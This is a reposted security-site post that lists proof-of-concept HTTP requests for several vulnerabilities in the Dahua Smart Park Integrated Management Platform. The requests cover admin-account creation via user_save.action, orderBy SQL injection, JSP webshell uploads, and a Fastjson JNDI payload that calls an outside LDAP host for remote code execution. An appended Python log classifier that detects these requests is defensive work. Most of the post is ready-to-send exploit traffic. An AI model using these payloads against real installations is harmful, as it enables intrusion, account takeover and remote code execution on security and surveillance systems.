Dahua Smart Park Integrated Management Platform user_save.action Arbitrary File Upload Vulnerability PoC

admin, 2024-09-28 14:22:26
POST /admin/user_save.action HTTP/1.1
Host: 
Accept-Encoding: gzip
Content-Length: 914
Content-Type: multipart/form-data; boundary=----fxwrpqcy
Cookie: JSESSIONID=65A8F19555DC1EFB09B5A8B4F0F6921C
User-Agent: Go-http-client/1.1

------fxwrpqcy
Content-Disposition: form-data; name="userBean.userType"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.ownerCode"

001
------fxwrpqcy
Content-Disposition: form-data; name="userBean.isReuse"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.macStat"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.roleIds"

1
------fxwrpqcy
Content-Disposition: form-data; name="userBean.loginName"

luqaahkf
------fxwrpqcy
Content-Disposition: form-data; name="displayedOrgName"

luqaahkf
------fxwrpqcy
Content-Disposition: form-data; name="userBean.loginPass"

lhndpuxl
------fxwrpqcy
Content-Disposition: form-data; name="checkPass"

lhndpuxl
------fxwrpqcy
Content-Disposition: form-data; name="userBean.groupId"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.userName"

luqaahkf
------fxwrpqcy--

 

POST /WPMS/login HTTP/1.1
Host: 
Accept-Encoding: gzip
Content-Length: 271
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"loginName":"luqaahkf","loginPass":"IxID6I8gKNSkCgu5UMwfRAhZpyvKKzu9q+dUngiieHiCTA52x3/uNB17NmAOletbzTOT46fLE5AOOMqMaqdDLA5rcsB3/Gql1qYwbNWLB6orKWpWEr9asUeNi/3ccIb95NUAXS1yn0l3ks94jbGT/CYbNq+JiBAeYlwcfdrqYkM=","timestamp":"16853622671401904168273612873678126378126387"}
/admin/login_login.action?subSystemToken=87a629bc14298c1533d8b52dd63e87f7
/upload/axqvssmz.jsp

Dahua Smart Park Integrated Management Platform getFaceCapture SQL Injection Vulnerability

/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D

Dahua Smart Park Integrated Management Platform searchJson SQL Injection Vulnerability

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

Dahua Smart Park Integrated Management Platform video File Upload Vulnerability

POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close

--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"

<%@page contentType="text/html; charset=GBK"%>
<%@page import="java.math.BigInteger"%>
<%@page import="java.security.MessageDigest"%>
<%
MessageDigest md5 = null;
md5 = MessageDigest.getInstance("MD5");
String s = "123456";
String miyao = "";
String jiamichuan = s + miyao;
md5.update(jiamichuan.getBytes());
String md5String = new BigInteger(1, md5.digest()).toString(16);
out.println(md5String);
new java.io.File(application.getRealPath(request.getServletPath())).delete();
%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"

poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"

submit
--dd8f988919484abab3816881c55272a7

Dahua Smart Park Integrated Management Platform devicePoint_addImgIco File Upload Vulnerability

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 243
Connection: close

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="1ndex.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

Dahua Smart Park Integrated Management Platform deleteFtp Endpoint Remote Command Execution Vulnerability

POST http://1.1.1.1/CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) 5bGx5rW35LmL5YWz
Content-Length: 205
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close

{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://cves.io","autoCommit":true}}}

Dahua Smart Park Integrated Management Platform Arbitrary Password Read Vulnerability

GET /admin/login_login.action
GET /admin/user_getUserInfoByUserName.action?userName=system
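
A defender-side check for the requests listed above, as an added example that is not part of the original post: it classifies logged requests (method, request target, body excerpt) against the endpoints and payload markers shown on this page. The sample records, the `captureTime` column name and the rule that valid `orderBy` values are plain column names are assumptions made for illustration.

```python
import json
import re
from urllib.parse import unquote, urlsplit

# Assumption: legitimate orderBy values are plain column names, optionally with asc/desc.
SAFE_ORDER_BY = re.compile(r"[A-Za-z_][A-Za-z0-9_.]*( (asc|desc))?", re.I)
JSP_FILENAME = re.compile(r'filename="[^"]*\.jspx?"', re.I)

def bad_order_by(path, body):
    m = re.search(r"/pageJson/(.*?)/extend/", path)
    if not m:
        return False
    try:
        order_by = str(json.loads(m.group(1)).get("orderBy", ""))
    except (ValueError, AttributeError):
        return True  # pageJson that is not a JSON object is suspicious by itself
    return bool(order_by) and not SAFE_ORDER_BY.fullmatch(order_by)

def jsp_upload(path, body):
    return bool(JSP_FILENAME.search(body))

RULES = [  # (name, method, regex on the decoded path, extra check), one per request type on this page
    ("account creation via user_save.action", "POST", r"^/admin/user_save\.action$", lambda p, b: True),
    ("orderBy is not a column name", "GET", r"^/portal/services/carQuery/getFaceCapture/", bad_order_by),
    ("JSP upload to material/file/video", "POST", r"^/publishing/publishing/material/file/video$", jsp_upload),
    ("JSP upload to devicePoint_addImgIco", "POST", r"^/emap/devicePoint_addImgIco$", jsp_upload),
    ("@type key in deleteFtp body", "POST", r"/swingCardRecord/deleteFtp$", lambda p, b: '"@type"' in b),
    ("user lookup by name", "GET", r"^/admin/user_getUserInfoByUserName\.action$", lambda p, b: True),
]

def classify(method, target, body=""):
    """Return the names of all rules matched by one logged request."""
    path = unquote(urlsplit(target).path)
    return [name for name, verb, pattern, check in RULES
            if method.upper() == verb and re.search(pattern, path) and check(path, body)]

FC = "/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/"
SAMPLES = [  # constructed log records: (method, request target, body excerpt)
    ("GET", FC + "%7B%22orderBy%22:%221%20and%201=updatexml(1,1,1)--%22%7D/extend/%7B%7D", ""),
    ("GET", FC + "%7B%22orderBy%22:%22captureTime%20desc%22%7D/extend/%7B%7D", ""),
    ("POST", "/emap/devicePoint_addImgIco?hasSubsystem=true", 'name="upload"; filename="1ndex.jsp"'),
    ("POST", "/emap/devicePoint_addImgIco?hasSubsystem=true", 'name="upload"; filename="icon.png"'),
    ("POST", "http://1.1.1.1/CardSolution/card/accessControl/swingCardRecord/deleteFtp",
     '{"ftpUrl":{"e":{"@type":"java.lang.Class"}}}'),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(method, urlsplit(target).path[:48], "->", classify(method, target, body) or "no match")
```

The two path-only rules (`user_save.action` and `user_getUserInfoByUserName.action`) match legitimate administration traffic as well, so their hits need correlation with the client address and session before they mean anything.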

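Originally published on the WeChat official account 左逆安全攻防: Dahua Smart Park Integrated Management Platform user_save.action Arbitrary File Upload Vulnerability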

Published by admin on 2024-09-28 14:22:26. When reposting, please keep the link to this article (CN-SEC中文网): https://cn-sec.com/archives/2008269.html
